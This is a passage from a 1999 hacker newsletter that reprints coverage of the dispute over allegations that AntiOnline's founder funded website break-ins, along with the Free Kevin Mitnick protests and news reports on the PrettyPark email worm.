planned to attend as we can possibly get to.
Sorry if this date change causes you problems, on the bright side however I
can confirm that after the first A-S Meet-up we plan to hold one every
month there after on the last Saturday of each month.
In A-S15 we'll publish literally ALL the details we can find that you might
need to know for the meet-up, including a selection of venues for
accommodation and all their contact details.
Cheers
-Armageddon
Editor of A-S Mag / HNC.
http://www.antisocial.cjb.net
http://www.hack-net.com
------------------------------------------------------------------------
Make the News Come to you! FREE email newsletters sent directly to
your in-box USAToday, Forbes, Wired, and more. Sign-up NOW!
http://clickhere.egroups.com/click/316
eGroups.com home: http://www.egroups.com/group/a-s_mag
http://www.egroups.com - Simplifying group communications
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include
#include
#include
main()
{
printf ("Read commented source!\n\n");
/*Well several problems kept me from producing the newsletter for the last couple if
*weeks so this is a 'make-up' release covering June 6th-26th 1999. Some areas may
*have been glossed over in order to keep the issue down in size,we'll be back to
*"normal" (whatever that is) next week... meanwhile have fun.
*
*Issue #22 June6th-26th
*
*BTW The reason ZDNet articles are not reprinted here is because they are using some
*funky method to defeat cutting and pasting of their text using framesets and shit if
*anyone knows a way to grab the text (source doesn't work either for some sites) let
*me know and i'll be most thankful... Cruci.
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 AntiOnline Crosses the Line
~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by whoever
After garnering intense media coverage (CNN, C|NET,
WIRED, etc.) over his extremely early reporting of the
MOD and gH attacks, John Vranesevich of AntiOnline
has used that spotlight to further his own agenda. Now
he has admitted to nurturing a hatred of hacking and
the underground as a whole and at the same time aiding
and abetting criminal acts, "Many times, I knew about
these instances before hand, and could have stopped
them."
AntiOnline Statement
A Change In Our Mission
An AntiOnline Editorial
Friday , June 04 1999
In the past, a hacker was an individual who literally had to spend years to learn the inner workings of computer technology, programming, and
hardware. Only then could he begin to explore possible vulnerabilities, and develop, for himself, ways to exploit those vulnerabilities, and more
importantly, ways to patch them. Through out these years of learning, the hacker would develop a certain respect for the technology that he was
studying, and a certain level of maturity would inherently develop as well. Now, in present day society, with point and click utilities abound, a younger,
less mature, less knowledgeable, and less respectful, generation of "hackers" have come to life.
That's a quote from an editorial that I wrote in September of last year. Now, only 7 months later, we've seen things get even worse.
When I started AntiOnline 5 years ago, it was a way for me to share with others the fascinating things that I myself was learning. The wonders of technology, how it
could be used as a tool, how it could be used as an incredible way to learn, meet new people, and indeed, make the world a smaller and more understanding place.
Since then, AntiOnline has grown to levels I never dreamed possible. I'm fortunate enough to be working full time on the site, I have my own office, equipment, and
T1 line. The resources I have at my disposal are still small and modest, but I've come a long way from where I was a year ago, running AntiOnline out of my parent's
living room.
Unfortunately, I've found myself looking in the mirror with disgust these past few months. Looking back, I've seen myself talking with people who have broken into
hundreds of governmental servers, stolen sensitive data from military sites, broken into atomic research centers, and yes, people who have even attempted to sell
data to individuals that presented themselves as being foreign terrorists. I've seen people change the medical records of individuals in our armed services, and delete
the work of tens of thousands of people that resided on large ISPs. Many times, I knew about these instances before hand, and could have stopped them.
I felt at the time, that I was serving a larger good by simply writing up information that I knew about these instances, and posting them on AntiOnline for the world to
read about. I felt that the incidents would be learning experiences, and that they would help technology to evolve, even if it was only in some small way. To me, the
important thing was not telling the world the "who", but the "why" and the "how". I tried to stand in an invisible realm between the hacker culture, and main stream
society. A realm which I now see does not exist.
Looking back, I see those years as being not beneficial to anyone but myself. Those years acted as an educational experience for me. A time for me to learn about
the "mechanics of the gun", but more importantly, a time for me to learn about the "people that pull the trigger".
In the past 7 months, I have seen things go from bad to worse. Incidents are becoming more frequent and more serious. To some degree, things are in a state of
anarchy. I now feel that I am in a position to help serve, even if in some very small way, the better good.
A little note to the Federal and Military Authorities that read this site:
I feel that I have been lax in my duties as a citizen to some degree. But, little known to the rest of the world, I have been working behind the scenes to change that.
For the past few months, we've been working with an Air Force contractor to help them develop the "profile of a hacker". AntiOnline, as an organization, plans on
taking that to an even higher level as the months progress.
Several of you have already signed up for access to our knowledge base, including individuals from: The US Congress, The DISA, The Air Force, The Navy, and
several police and computer forensics organizations. You will be given access information within the next week.
A note to these organizations as a whole. I know that often times my exact position and role has been confusing. Let it be confusing no more. I hope that over the
next few months, the level of trust between my organization and yours can continue to grow, and I hope that AntiOnline becomes a valuable tool in the fight against
"CyberCrime".
Now, a little note to the thousands of hackers that read this site:
You yell and scream about freedom of speech, yet you destroy sites which have information that disagree with your own opinions. You yell and scream about
privacy, yet you install trojans into other's systems, and read their personal e-mail and files. You truly are hypocrites. All of these grand manifestos that you develop
are little more than excuses that you make up to justify your actions to yourself. Actions which you know are wrong. Actions which do not serve anyones interests
but your own.
Let me just say, that you've had free reign over things this past year or so. I know that some of you are playing what you feel is a game. A game that you think you
are winning. Some of you sit back and laugh at organizations like the FBI. You make sure that you provide enough information to make it obvious who you are, yet
are careful not to provide enough information to actually have it proven.
I have been watching you these past 5 years. I know how you do the things you do, why you do the things you do, and I know who you are.
Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline
As a side note, AntiOnline will be taking no press inquiries into this matter.
Questions regarding this change in policy will not be answered by phone.
Send all questions or comments to jp@antionline.com
-=-
A special report has now been released that details the
close ties that John Vranesevich of AntiOnline has with
the evil doers of the underground. This report claims
that John Vranesevich actually paid individuals who later
broke into web sites and then gave him 'exclusive'
reports. This report is highly suggested reading for any
journalist or reporter who has ever questioned Mr.
Vranesevich about anything. It is also suggested that
'customers' of the AntiOnline Knowledge Base read this
report and be familiar as to the type of person that is
supplying this information. And finally any law
enforcement officer who is investigating the
whitehouse.gov or any other MOD cracks should
absolutely read this report.
AntiOnline Crosses the Line
http://www.attrition.org/negation/special/ (Go here for full links and info)
AntiOnline crosses the Line
6.7.99
INTRO:
John Vranesevich is the founder of AntiOnline [www.antionline.com].
During the past five years, AO has grown from a five megabyte hobby web site, into a
multi domain business venture with hundreds of thousands of dollars in venture
capital. AntiOnline now claims to be the number one security resource on Internet.
Despite this growth and development, AntiOnline has been under continual fire from
critics and friends alike. Serious questions have been raised to the methods of reporting,
staff background, journalistic integrity and business practice.
Since AntiOnline has become a commercial entity (02-22-99), the site has released
67 pieces (some news articles, some 'specials'). Of these, 12 have been found to
contain serious errata. So of the 'reporting' that AntiOnline
has conducted, close to 20% has been inaccurate.
Recently, information has come to light that suggests a far more serious agenda
exists at AntiOnline. In the past, AntiOnline had two incidents that brought them
into the spotlight, and put them on a journalistic pedestal so to speak.
The first was centered around two teenagers in Cloverdale CA, and one adult in Israel that
was known as "Analyzer". AntiOnline got the scoop that these three (and others) were
responsible for compromising hundreds of military and government servers.
Through repeated interviews and communication, AntiOnline managed to hype up these
attacks which lead to them being described as "the most organized and systematic
attack the Pentagon has seen to date." A short while later, it was discovered that
this threat was nothing more than a group of mostly teenagers breaking into low
security machines.(1)
The second spotlight shone on AntiOnline after several exclusive stories and interviews
with a group calling themselves "The Masters of Downloading". AntiOnline reported
that the members of this group were responsible for compromising hundreds of
"high security" Department of Defense computer systems, and stealing
files they said were "obtained from the classified Defense Information System
Network." Interviews between AntiOnline and the cracker said "I think international
terrorist groups would be interested in the data we could gain access to.."
Media outlets such as ZDNet unknowingly drew comparisons in the two stories.
ZDnet said in one article(2) "The alleged hack - which follows a highly publicized
attack on Pentagon computers by an Israeli hacker known as the "Analyzer" and his
associates -- would be a major escalation of "informational warfare" on
government computers."
From all appearances, AntiOnline was single handedly responsible for a significant
amount of the media sensationalism. Not only had AntiOnline driven the media hype
behind the stories, they put various government and DOD organizations on full
alert preparing for the fallout these attacks would cause.
There is new information coming to light suggests that AntiOnline had a more integral
part in the generation of their news. That the typical journalist/contact relationship
did not exist, and in fact, AntiOnline may have been responsible for creating some
of the news to report on.
With these recent allegations coming to light, the ATTRITION staff and several
associates set out to find out the details and foundations of the assertions.
OUR GOAL:
To prove Masters of Downloading (MOD, headed by a hacker named so1o) was paid by
John Vranesevich/AntiOnline to hack www.senate.gov or another high profile site in
order for AntiOnline to break major news. To further establish that AntiOnline
employs active and potentially malicious hackers.
REQUIREMENT:
To prove this, we must first prove several points.
allegation evidence
---------- --------
so1o is on Antionline payroll proof.1 (Email)
so1o == Chris McNab proof.2 (Email)
so1o is an MOD member proof.3 (Comparison of MOD/CZ hacks)
proof.5 (IRC chat with so1o)
AO reported on it first proof.4 (AntiOnline reports)
ADDITIONAL:
On June 3rd, 1999, John Vranesevich released an editorial titled
"State of the Union". This piece calls into question the true relationship
between Mr. Vranesevich and Chris McNab (a.k.a. so1o). The relevant text
and concern it raises, coupled with the time of this editorial and subsequent
information presents a more damning argument.
On June 4th, 1999, John Vranesevich released a more dramatic and disturbing
editorial titled A Change in Our Mission. To most of his readers,
this was no doubt surprising, but expected. For a smaller group of us, the timing
of this article suggests much more. On the afternoon of June 3rd, an individual
questioned Mr. Vranesevich about his ties to so1o. When challenged,
Vranesevich begins to deny his involvement with McNab. This denial comes
after mail explicitly stating he WAS funding McNab, and after working with
McNab on an AntiOnline "exclusive" on the MOD hacks. The following
log and comments illustrate the denial and further backs our goal.
CONCLUSION:
One would hope that high ethical standards are above the law and are in effect
with ANY media outlet. It seems that isn't true. Not only has AntiOnline descended
into the realm of unethical journalism and business practice, they have done it
while thumbing their nose at the Internet. As if they can commit these practices
with impunity, John Vranesevich taunts "Well, it would take a lot more than an act
of congress to get AntiOnline shut down =) I could always ship the site off
to England ;-) That's another good thing about the Internet. The laws of one land
don't hold true in them all ;-)". This was written as a reply to one comment in
the AntiOnline mailbag on 7-13-98.
As if this is not bad enough, Vranesevich has recently gone on to admit to
some of his deeds. In a "change of mission statement" released on 6.4.99,
he goes on to say "Many times, I knew about these instances before hand, and
could have stopped them."
The information presented above is more than adequate proof that John Vranesevich
is funding an active hacker to break into high profile sites. The motivation for this
is to increase the awareness and therefore the profitability of his web site AntiOnline.
He pays people to break into sites in order to report on it as an 'exclusive'.
Folks.. 1 + 1 still = 2.
Direct comments or questions to: staff (staff@attrition.org)
* Any instance of [snip...] is strictly removing unrelated material. Anything
relevant to our argument or anything that would affect our allegations
were left. What we do is no different than what JP does to his 'mailbag'.
Except we leave in material that would possibly weaken our argument. His
mailbag gets clipped to include only the material he wants to deal with.
* Permission from Bronc and Ken was given to include the email here.
@HWA
03.1 More Questions Raised about John Vranesevich and AntiOnline
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th
from HNN http://www.hackernews.com
contributed by Bronc Buster
The rhetoric continues. Did he or didn't he? John
Vranesevich has posted a rebuttal to the original
attrition.org report that claimed he funded crack
attempts. The rebuttal is more of a personal attack
than a response to the allegations. Wired Online and
Telepolis have written articles that try to shed some
light on the situation. Bronc Buster has written an open
letter to John Vranesevich that asks some very pointed
questions. Questions that I think everyone would like an
answer to.
Attrition Report on John Vranesevich
http://www.attrition.org/negation/special/
John Vranesevich Rebuttal
http://www.antionline.com/cgi-bin/News?type=antionline&date=06-07-1999&story=brian.news
Wired Online
http://www.wired.com/news/news/culture/story/20062.html
Telepolis- German
http://www.heise.de/tp/deutsch/inhalt/te/2921/1.html
Open letter from Bronc Buster
http://www.hackernews.com/orig/broncjplet.html
The Wired article and JP and Bronc's letters follow:
Wired;
Hacker Pundits Squabble
by Polly Sprenger
12:15 p.m. 7.Jun.99.PDT
A Web site addressing computer hacking issues has accused a computer security
pundit of paying individuals to break into Web servers in exchange for exclusive
coverage of the stories that result.
John P. Vranesevich, editor of computer security magazine and resource center
AntiOnline, denies the charges.
Vranesevich is well known in the hacking and cracking community. He is often
called on by news media, including Wired News, to provide perspective on Web site
break-ins, viruses, and other security issues.
A report by the group Attrition.org, released Monday, accuses Vranesevich of
paying hackers to break into sites, thus guaranteeing him an exclusive on the
stories.
"We've never paid for a story," Vranesevich said. "We don't even pay our
reporters for stories. [The allegations] are flat-out libelous and there's no proof to
it. It's an attempt to destroy, defame, and discredit me."
Vranesevich's detractors were already inflamed over his recent apparent shift in
allegiance. On Friday, Vranesevich posted an editorial on his Web site that stated
he was working with the Air Force and other government agencies to help track
down crackers.
"A little note to the thousands of hackers that read this site," Vranesevich warned,
"I have been watching you these past five years. I know how you do the things
you do, why you do the things you do, and I know who you are."
His warnings have stirred the ire of attrition.org, led by Brian Martin (who
goes by the name Jericho). Martin said he has been following Vranesevich's case for
more than a year.
Martin based his claims on two emails that allegedly show Vranesevich had a
business relationship with "So1o," the hacker accused of breaking into
senate.gov last year. Vranesevich said the emails displayed on Martin's site
"never existed."
Another chronicler of the computer security underground said that
Vranesevich's reputation is less than pristine.
"He has made a lot of enemies over the years," said Space Rogue, editor of the
Hacker News Network. "This particular accusation has been unproven for awhile.
It's been thought that this has been going on for some time, that he was
paying people or was in league with them."
Space Rogue cited one particular revelation in Vranesevich's Friday statement.
"Many times, I knew about these instances [site hacks] beforehand, and
could have stopped them," Vranesevich wrote.
"That basically for me solidifies everything in the attrition report," Space Rogue said.
Vranesevich said that he has never been popular with the underground hacker
culture because of what he's done to expose it. "I often say that they hack a
site first and make up a manifesto second," Vranesevich said.
He points to his press citations in recent weeks, which include mentions in The
New York Times, ABC News, and CNN. He also said that government agencies such
as NASA rely on him to provide data on hacker profiles.
But while Martin accuses Vranesevich of using his fame as a platform to
prosperity, Vranesevich says he doesn't charge those agencies for access to data
and will probably keep the information free of charge forever.
"I think my track record speaks for itself," Vranesevich said. "I'm proud of how I've
accomplished and what I've accomplished."
JP's rebuttal
AntiOnline Responds To Allegations
Monday, June 7, 1999 at 11:51:56
by John Vranesevich - Founder of AntiOnline
First off, for those of you that haven't read it, Brian Martin's
Attrition website has today posted allegations that AntiOnline
funded the Whitehouse.gov and Senate.gov hack so that we
would have news to cover (However, I'm sure most of you have
read it by now, because of organizations, and I use the term
loosely, like the Hacker News Network).
Needless to say, when I went forward with the statement that
AntiOnline was going to help in the fight against malicious
hackers, I expected some backlash from the hacker community.
A few dozen extra hack attempts a day, some synfloods. Maybe
I'd find myself with a $10,000 phone bill. But, they've apparently
chosen something far more creative.
First off, let me say this. Brian Martin (aka Cult_Hero) was
raided by the FBI in connection with being a suspected member
of the HFG (The group that hacked the New York Times), and
Erik Ginorio (BroncBuster) is known, and admits, to breaking into
dozens of sites (he calls himself a hacktivist). The fact that these
two could think, or at least think up, some grandiose scheme
which involved AntiOnline bankrolling hackers, is not surprising.
They have both lived their lives trying to break, and evade, the
law.
For some reason, Brian Martin has become obsessed over
AntiOnline. His website has dozens and dozens of pages of what
he calls "errata" that he's written about it. He takes information
posted on our site out of context, then criticizes us because of it.
Many people have written in asking why we never posted any
response to all of the allegations he has on his site about us.
Personally, it's because I felt that I didn't need to justify myself,
or my actions, to someone who is currently under FBI
investigation, and who has never done anything for the security
scene other than criticize others. I actually feel bad for him. The
fact that he spends such a large portion of his life trying to "bring
down" others using lies, deceit, and twistings of the truth, is sad in
my eyes.
As for these allegations that I paid people to break into
government sites so that I could write a story. Let me just say,
that such claims are so far fetched and preposterous, I'm not
even going to respond to them on a point by point basis.
It seems that almost all of the criticisms that I receive from
people like Brian Martin revolve around money. He says in his
"allegations" about AntiOnline that "During the past five years,
AO has grown from a five megabyte hobby web site, into a multi
domain business venture with hundreds of thousands of dollars in
venture capital." Is that what he's so upset about? That I've made
a ton of money? Well, let me put his mind at ease. The point in
fact, is that I don't now, nor have I ever in my life, had a lot of
money. Our venture funding wasn't in the amount of hundreds of
thousands of dollars. I am not ashamed to say, and in fact, I'm
very proud to say, that our original funding was in the amount of
$75,000. I am very proud of the levels I have taken AntiOnline to
with very little resources, and a lot of hard work. On average, I
put in 17 hour days working on the site and related matters. At
the age of 20, I'm trying to build a life long career for myself. So,
to people like Mr. Martin, let me just say that anything my site
has accomplished has not, and truly couldn't have been, from me
throwing money at it. It came from my love for what I do, and
my willingness to put in the time it takes to accomplish my dream.
In a way, I take these allegations that have come against me as a
sign that I'm on the right track with what I'm doing. If people like
Brian Martin weren't yelling and screaming about me, I guess I'd
take that as a sign that I'm off the beaten path. If people like
Brian Martin didn't see me as a threat to them, they wouldn't be
yelling. So, I'm going to view these recent allegations as a job
well done letter from the malicious hackers of the world.
I have always lived my life in a way which I was proud of, and I
will continue to do so. I will NOT allow people like Brian Martin
and Erik Ginorio to cause me to constantly be taking some sort of
sick defensive on my site (Which is probably what their intentions
are). That's not its purpose. So, if they come out with some new
allegation, like I have secrets plans to assasinate the president
with a herf gun or something, you won't find a response to them
from me here. As a matter of fact, you won't find a response
from me at all. I will let the work that I put forth, and the actions
that I take in my daily life, be my response.
Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline
Bronc's open letter;
An open letter to John Vransevich (aka JP)
07 Jun 1999
from: Bronc Buster bronc@2600.com
subject: in regards to the allegations at
http://www.attrition.org/negation/special
John Vransevich (aka JP),
The staff of Attrition.org, a few other individuals, and I
have been working over the last few weeks to peice
togeather a complex web of clues. These clues were
leading us to something we have suspected for a while;
something that could tarnish the entire hacker community.
What if someone, a reporter, was funding a known criminal
to commit crimes so that they might have an inside scoop
on the story? Not only would this be unethical, but illegal,
and dangerous for us all.
Several people have been asking how Antionline.com (AO)
has had such an inside scoop on breaking stories, before
anyone else regarding big hacks that you have reported
on. We have begun to make a theory, based upon facts
as to how we think this is happening.
Here are a few simple YES or NO questions regarding
these allegations and their impact..
1) Because you had reported, in the past, the exclusive
reports and interviews on how Masters of Downloading
(MoD) had hacked(?) DISA and were alledged to have
taken software off their server, it is obvious you knew
who the person was who had comitted this crime. His
handle is so1o (aka Chris McNab). You have admitted to
this openly. Knowing this, you then started funding a
company ran by Chris McNab to make some sort of
security program. This you have also openly admitted to.
Now Chris McNab, by your own admittance, comitted the
crime of breaking into several Government servers and
ultimatly defacing www.senate.gov. If you were funding
this person, and you knew he was a criminal, not only who
has comitted crimes in the past you knew about, but had
crimes, such as the senate.gov hack, planned out that
you knew about before hand, and he then gave you an
exclusive on the story because he was getting money
from you (regardless if he still is), doesn't this, in your
mind, equal a totaly unethical, not to mention illegal, way
to get a story?
2) On your site, you openly admit to prior knowledge of
crimes that were comitted that you may or may not have
reported on. This is illegal. Do you think this fact,
combined with the fact that you, in some fashion, were
supplying a known criminal (Chris McNab) with money is an
ethical way to run your site/business?
3) In your response to the revealed allegations againt
you, you posted on your site, there was no link provided
(to attrition.org) so that anyone interested, who may see
this on your site but not know about the allegations, to
see both sides of the story and come to their own
conclusions. Attirtion.org posted many links to your site,
so that people could see both sides. Sense you posted a
response, don't you think it isn't fair to your readers, to at
least let them judge for themselves this matter?
4) Do you think that by making personal attacks against
the people behind these allegations, and against the sites
that are covering it, that the serious issues raised have
been answered or at least addressed?
5) Do you in any way feel obligated to provide any
answers to:
a) The people making these allegations?
b) Your readers and supporters?
c) The hacking/security community in general?
6) Last but not least. Do you think anything positive can
be gained by the hacking community by your actions in
these matters?
I personally think that your response to the criminal
charges against you was childish and immature at best,
and this matter warrents a serious reply. Slinging mud,
and voicing your opinion about people is no way to
counter facts. These are felonies, and invlove not only
local, but federal laws. This is a serious matter, and like so
many of the poor kids you cover who get busted, it
appears you will not take it seriously until you too have
been arrested and charged.
Bronc Buster
bronc@2600.com
June 9th , a statement from OSAII
Admissions
Mike Hudack
Editor-in-Chief
The same day that a Wired News article about the Attrition
special report accusing AntiOnline of unethical and even criminal
practices came out, I spoke with John Vranesevich on the phone.
The Wired News article quoted Vrasenevich (JP) specifically
denying the existance of two e-mails which were used as evidence
in the Attrition article. JP said the e-mails "never existed,"
according to Polly Strenger, author of the Wired News article.
In my discussion with JP, however, he said "I was quoted out of
context in those e-mails." I queried him further, asking him
whether those e-mails really existed. He said "the e-mails existed
but I was quoted totally out of context -- what I said was in jest."
In a conversation hours later, however, he quickly backtracked,
saying the e-mails were "manufactured, possibly from several
e-mails." He said they were his words in the sense that "words
taken from two pages in a book and made to look like a
paragraph are the authors words. They´re still manufactured."
This obvious contradiction between what I was being told the first
time and what he had told Wired News wasn´t the end of it
however. He went on to warn me not to "write articles against
individuals or other sites. It doesn´t help your relationship with the
mainstream -- I learned that the hard way." This statement was
obviously a warning not to say anything about our conversation.
He went on in his contradictions, however.
In the Wired News article, JP is quoted as saying that the
allegations against him are "flat-out libelous." In the telephone
conversation, however, JP admitted that "the allegations weren´t
really libelous. If anything they were borderline." He did say,
however, that it was up to his "lawyer as to whether to pursue
legal action."
The clear dicotomy between his earlier statements to Wired News
and his statements to me wasn´t the most fascinating issue,
however. What was much more fascinating, as Polly Strenger said
was "why didn´t he just say he was quoted out of context? That
would have made a lot more sense."
Later, in an open letter to JP, Bronc Buster called JP´s response
to the allegations "childish" for attacking the individuals raising the
allegations and not the allegations themselves. In his reponse, JP
not once mentions that he was quoted out of context. Rather, he
accuses Jericho and Modify (two authors of the allegations) of
being subjects of an FBI investigation. He not once addresses the
allegations being levelled against AntiOnline and himself.
OSAll carefully weighed whether to come forward with JP´s
statements, and has decided that it has an ethical obligation to do
so. Any questions about this coverage, its fairness or OSAll´s
relationship with either Attrition.org or AntiOnline.com should be
directed to the editor, who can be contacted at
editor@aviary-mag.com or by phone at 203-335-7100.
@HWA
04.0 The Difficulties of Reporting the Underground
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by Space Rogue
In light of all the media attention that hackers have
gotten over the last few weeks it is apparent that most
reporters and journalists are having a difficult time in
accurately reporting the computer underground. While
no one is claiming that it is easy, HNN editor Space
Rogue takes a look at some of the more common pitfalls
in this new Buffer Overflow article.
Buffer Overflow
http://www.hackernews.com/orig/buffero.html
05.0 Mitnick Demonstrations Deemed a Huge Success
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by Freaky, phar, and Silicon Monk
Last Friday at 2pm in front of federal courthouses in
over 16 cities people who could no longer sit down while
excessive punishment was dealt by an overreaching
government, gathered together to protest the large
number of injustices perpetrated during the trial of Kevin
Mitnick. At the demonstrations in Philadelphia a large
paper mache Liberty Bell was displayed. Reba Mitnick,
Kevin's grandmother was present at her local
demonstration. In New York a skywriter wrote FREE
KEVIN over Central Park and in San Francisco low flying
airplanes carried FREE KEVIN banners.
FREE KEVIN
http://www.freekevin.com
Mitnick Demonstartions - Pictures Here
http://www.2600.net/demo/
CNN
http://cnn.com/TECH/computing/9906/04/BC-INTERNET-HACKERS.reut/index.html
Wired
http://www.wired.com/news/news/politics/story/20053.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2270517,00.html
Salon
http://www.salon.com/tech/log/1999/06/04/mitnick/index.html
Wired;
Pro-Mitnick Demos in US, Russia
by Polly Sprenger
3:00 a.m. 5.Jun.99.PDT
In 15 American cities and Moscow,
demonstrators staged protests Friday
against the continued imprisonment of
Kevin Mitnick, jailed after pleading guilty
to seven counts of wire and computer
fraud.
"Just don't call him a 'celebrity cracker,'"
growled Macki, the Webmaster for 2600,
the hacker group and magazine that
organized the events.
Armed with yellow "Free Kevin" stickers
and flyers describing Mitnick's case, Macki
and nearly 20 other Mitnick supporters
battled the miserable San Francisco wind
to fight for the cause.
"We're getting the word out to the
worldwide and national consciousness
about [Mitnick's] sentencing," said Marc
Powell, a pink-haired member of the local
hacker collective New Hack City.
Clad in an "I [Heart] Feds" T-shirt, Powell
said that although his own
cyber-tomfoolery has been strictly within
the law, he sympathized with Mitnick's
imprisonment.
As far as protests go, Mitnick's
demonstration was relatively low-key.
The attendees cheered as a low-flying
airplane went by trailing a banner that
said "Free Kevin Mitnick --
www.freekevin.com," but after seven or
eight more passes, the enthusiasm
waned.
Some in the group had followed Mitnick's
plight from the beginning, but others were
just there to be part of an
anti-government staging. Robin, a
self-proclaimed anarchist and network
administrator with a partially shaved head
and a plethora of piercings, said he was
in attendance because it was a strike
back at the government.
But others, like Perry McNulty, said
Mitnick was a study in civil rights. "It's
not just a hacker in jail," said McNulty,
who has followed Mitnick's case for about
a year. "A lot of civil rights have been
violated. It could happen to any one of
us."
Salon
Kevin Mitnick supporters plan rallies
- - - - - - - - - - - -
BY KAITLIN QUISTGAARD
June 4, 1999 | Since his 1995 arrest for wire and
computer fraud, famed hacker Kevin Mitnick has been
behind bars. In March a judge sentenced him to a
46-month prison term after he pleaded guilty to a
handful of the 25 charges filed against him. But on
Friday, demonstrators in 15 U.S. cities and Moscow
plan to protest what they see as the unjust treatment
of Mitnick and ask for his parole to a halfway house.
"The guy's been in there for something like four years
and four months," says Emmanuel Goldstein, editor of
"2600: the Hacker Quarterly." (Actually, 2600's Kevin
Mitnick Lockdown Clock put it at exactly 4 years, 3
months, 16 days, 11 hours, 19 minutes and 41
seconds at that moment, but who's counting?)
It's a heavy sentence for just looking at other people's
software, says Goldstein: "The federal government is
using him to send a message."
"Even if Kevin were guilty of everything he was
charged with," the 2600 site says, "the fact remains
that there was no documented damage, no evidence of
malicious activity, and nothing to suggest that Mitnick
profited in any way by reading the software he is
accused of accessing." The journal says it has
uncovered letters showing that companies like Sun
Microsystems and Nokia have claimed a combined
total of $300 million in damages resulting from
Mitnick's hacks. "This is a case of corporate
vengeance, aided and abetted by a federal government
seeking to intimidate hackers," the 2600 site argues.
"We think Kevin Mitnick's suffering has gone on way
too long."
2600 is encouraging demonstrators to meet at federal
courthouses across the country and the U.S. Embassy
in Moscow. The protest will coincide with the monthly
2600 meeting, which brings hackers together in
various cities on the first Friday of the month. ("That
way the people who spy on us have to spread
themselves thin," says Goldstein, explaining the
same-time, multiple-locations approach.)
On June 14 a judge will formally sentence Mitnick and
determine the damages he owes. The hacker group
hopes to influence the court to go lightly on Mitnick.
"The judge has the opportunity to sentence him to a
halfway house," says Goldstein, "which is a whole lot
better than a prison with murderers and rapists."
salon.com | June 4, 1999
- - - - - - - - - - - -
About the writer
Kaitlin Quistgaard is an associate editor
for Salon Technology.
@HWA
06.0 New Trojan/Virus, PrettyPark
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 7th 1999
From HNN http://www.hackernews.com/
contributed by nvirB
A new virus/trojan, PrettyPark arrives as an email
attachment and then resends itself to users listed in the
windows address book, it may possibly repeat this as
often as every 30 seconds. It also attempts to log into
IRC channels to deposit information. Opinions vary as to
threat level of this new virus. At last report it had only
been seen in France.
MSNBC
http://www.msnbc.com/news/276805.asp
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2270411,00.html
MSNBC
PrettyPark: Part worm, part Trojan
Anti-virus companies unearth worm/Trojan that reportedly
e-mails PC’s Windows Address Book every 30 seconds
By Joel Deane and Michael Fitzgerald
ZDNN
June 4 — Anti-virus companies said Friday that
W32/PrettyPark, a new e-mail worm program with
Trojan horse characteristics, poses a potentially
high risk to Internet users on Windows-based
systems.
Weigh in on PrettyPark
New Back Orifice-like Trojan found
CIH virus set to strike again
Melissa spawns more offspring
E-mailed wolves in sheep's clothing
ALTHOUGH ASSESSMENTS OF PRETTYPARK’S
capabilities vary, and damage reports are sketchy, anti-virus
firms advised Friday that users update their anti-virus
programs to guard against the worm/Trojan, which was
discovered as early as May 12.
Anti-virus company Panda Software said PrettyPark,
which is also known as Pretty Worm, reaches users’
computers as an attached file in an e-mail message, just like
the Melissa virus. Once executed, PrettyPark installs itself in
the infected system, then sends messages with an attached
copy of itself to addresses listed in the Windows Address
Book.
PrettyPark hits Windows users hard
Panda said PrettyPark attempts to connect to an
Internet relay chat server from a list of 13 possible servers,
then send a message to a chat user — enabling the author of
the virus to gather data on and monitor affected workstations.
PrettyPark can then be manipulated as a Trojan horse, Panda
said, to obtain data such as the list of available disks and
confidential information such as logins and Internet
connection passwords.
Panda Software U.S. executive director Pedro
Bustamante said Friday his company had replicated the
“potentially high risk” worm/Trojan in its European anti-virus
lab. “It could potentially be very high risk,” Bustamante said.
“The interesting thing about this new Trojan is that, unlike
Melissa, it doesn’t send itself once; it sends itself every 30
seconds.”
Trend/Micro, Symantec and Network Associates
reported Friday that they have been unable to duplicate
PrettyPark. In a virus alert, Network Associates said
PrettyPark was low risk.
Trend/Micro director of technology Dan Schrader said
the anti-virus company’s customers reported PrettyPark’s
auto-spamming, but “can’t confirm the auto-spamming
function.”
“We’ve seen 40 incidents in the last 48 hours. All the
incidents so far have been in France,” said Schrader, adding
that PrettyPark was similar to the notorious Happy 99
executable that struck earlier this year.
Schrader said PrettyPark has the potential to spread
widely — if it can in fact automatically send itself to
everyone in a user’s address book. But, because
Trend/Micro has been unable to replicate this auto-spam
capability, and because it so far seems to be centered in
France, Trend/Micro suspects that someone may have
spread it by hand.
Symantec, Trend/Micro, Panda and Network Solutions
have all posted anti-virus updates to cover PrettyPark.
Luke Reiter of CyberCrime contributed to this report.
@HWA
06.1 The rampage continues
~~~~~~~~~~~~~~~~~~~~~
June 8th 1999
From HNN http://www.hackernews.com/
PrettyPark Continues its Rampage
contributed by nvirb
PrettyPark the latest virus/trojan/worm is quickly
spreading around the world. The virus arrives as an
email attachment. Then after it is executed it hides
behind a screen saver to mail out copies of itself and to
connect to an IRC channel. In a quote given to MSNBC,
Steve Trilling of Symantec said, "This virus took months
to write, and its creator put a great deal of effort into
it."
MSNBC
PrettyPark hits Windows users hard
Victims of e-mail virus increase 2,000 percent over the
weekend, Symantec reports
By Shauna Sampson, ZDTV
ZDNN
June 7 — PrettyPark, a French e-mail virus, got a
tremendous boost from home PC users this
weekend. Anti-virus software maker Symantec
said it has observed an increase of 2,000 percent
in apparent victims since Friday.
THESE VICTIMS OF THE VIRUS, which is being
described as a worm with Trojan capabilities, are likely
